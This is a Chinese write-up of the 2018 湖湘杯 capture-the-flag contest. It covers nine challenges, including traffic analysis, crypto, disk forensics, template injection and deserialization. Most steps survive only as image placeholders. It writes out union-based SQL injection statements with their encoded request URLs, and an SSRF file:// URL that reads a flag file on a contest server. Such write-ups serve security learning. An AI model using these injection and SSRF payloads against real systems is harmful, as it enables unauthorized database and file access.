<
2018-湖湘杯Writeup
>
上一篇

PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患
下一篇

绕过CDN查找网站真实IP

2018-湖湘杯Writeup

1题目名称:Flow(流量分析题)

Kali破解WPA

img

生成ctf-dec-pcap

img

http过滤找到flag

img

2.题目名Replace

解题思路、相关代码和Flag截图:

img

img

img

img

3.题目名:code check

code check writeup

0x01.使用工具扫描出

img

0x02. news 目录下有 list.php的源码

list.php

img

\1. id可控 经过decode 函数处理 传入sql语句

\2. decode 函数 将 id 两次base64_decode 之后的值 通过 mcrypt解密,之后判断后7为字符是否为‘hxb2018’,是则返回‘hxb2018‘前的字符 。

3.id 的值带入了sql语句,id可控制,所以可以造成sql注入

img

此处可得知。sql语句查询出的结果在页面有回显,故可能为 union 注入

0x03 构造payload

由 list.php可知 我们只需将 注入语句(id)拼接 ‘hxb2018’ 之后通过 mcrypt加密之后 经过两次base64_encode 之后就可以造成sql注入。下图为构造payload的代码,id为注入语句

img

0x04 实现

  1. 查数据库版本,当前数据库名称

​ 注入语句 :-1 union select 1,version(),database(),4 –+

​ payload: /news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDaDU5OEtEOExJZTVJdkJLT1QraXB2UXdPTUNMVGNjbzVDeVUvMkY1Yjlvam4xWTlMTkJieTYzYmpuckI2S0RPcXc9PQ==

​ 回显 :

img

  1. 查数据库表‘

​ 注入语句: -1 union select 1,2,group_concat(distinct table_name),4 from information_schema.columns where table_schema=’mozhe_discuz_stormgroup’ –+

​ payload: /news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDamtLbjk5ZUsvTkV5cEY5bjBSUGJEOGZvS0xjY2hTOENQVE95TlBwL3Nrakc4MjZhM0dvaFJYRGZPV1RwS3A1Q2pJbUVaZkxGbmNBNFo4NUlCWnkrcDN2RWw3YW9GQWlRSUQ5Mm8vLytUUWxnWUZNQU5uTWpNZklJZFpoS09QODB3c3dqWjJaVWJ2aXl0UjBNWS9nUWZvUXkybm51TDZMMTc4YWV1Q0Q4M1Fh

​ 回显:img

  1. 查表中字段

​ 注入语句:-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=’notice2’ –+

​ payload: /news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDamtLbjk5ZUsvTkV5cEY5bjBSUGJEOFlaZjExMXovODJUaTF2R1JEMVFwbjl3Mkk2N1BrSE8wNnd1aExrcDVMM0kwMEY1c01iRzlCZUtzTlExT0l0d1Ywc2JmcDdPZnFZeFNnRkVwYmRBbVhtZksxZ0l3d1JlRWt6aUVGbW94MEovR1hpUTk1T1NXRFlYam45ZHNpaGtrPQ

​ 回显:img 4 . 查字段值

​ 注入语句:-1 union select 1,2,concat(id,0x2d,title),4 from notice2 –+

​ payload: /news/list.php?id=eGdkNThpcFRybng4VnpTQkppY3FDbVd0dGlsUUFsY2RMVkR

4、题目名 HighwayHash64

解题思路、相关代码和Flag截图:

img

img

img

imgimg

img

hxb2018{9352641078}

5、题目名 Common Crypto

解题思路、相关代码和Flag截图:

sbox 确定aes

img

img

img img

hxb2018{d9e801ec

30386334623434393136633963356136

hxb2018{d9e801ec08c4b44916c9c5a6

hxb2018{d9e801ec08c4b44916c9c5a6}

6.DISk

用WinImage打开,看到如下4个文件提取4个文件的二进制数据,如下:

img

img

img

拼接解的flag: flag{4DS_1n_D1sk}

7.XmeO

0x01 探测

​ 输入 . 发现页面回显是 2 执行命令了,结合之前的一次ctf的试题,推测可能是沙箱逃逸的漏洞。又是模板注入考了至少3次了。。。

0x02 测试

​ 推测是沙箱逃逸了,于是网上搜索文章 https://blog.csdn.net/wy_97/article/details/80393854。开始了测试

. 可以查看 根目录的文件

. 查/home下 文件中包含 hxb的字符串

img

8. Readflag

ssrf读取文件的时候,找到了web目录

a7f4c9890122bee9e9741ae39af94ff1

起先以为是代码审计绕过后来测试发现不是,访问flag发现得到结果。47.107.238.143/?url=file:///var/www/html/ssrf/flag

b31c0ca8c731000c273f5d77b53835fe

9.MyNote

访问:http://47.107.234.8/robots.txt

Roots.txt泄漏

img

这道题是个反序列化,注册账号登陆MyNote后发现Picture是个base64编码,上传图片解码发现是反序列。后通过对队友查找资料后发现是原题

地址:https://0v3rw4tch.github.io/2018/06/23/anheng-6month/

于是根据robots.txx编写反序列化脚本:

img

img

img

Top
Foot